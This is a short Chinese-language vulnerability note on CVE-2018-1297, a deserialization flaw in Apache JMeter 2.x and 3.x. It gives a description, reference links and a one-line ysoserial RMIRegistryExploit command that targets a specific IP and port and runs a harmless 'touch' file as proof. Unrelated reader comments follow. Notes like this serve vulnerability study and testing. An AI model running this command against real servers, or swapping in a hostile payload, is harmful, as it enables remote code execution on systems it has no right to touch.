CVE-2018-1297
漏洞描述:Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。
影响版本:其2.x版本和3.x版本中存在反序列化漏洞
参考资料:
- https://github.com/frohoff/ysoserial/releases/tag/v0.0.6
- https://blog.csdn.net/JiangBuLiu/article/details/95492587
- https://xz.aliyun.com/t/2225
漏洞复现
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 123.58.224.8 12605 BeanShell1 'touch /tmp/CVE-2018-1297_is_success'
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 2个月前0
好的,谢谢昶之琴 2个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 2个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下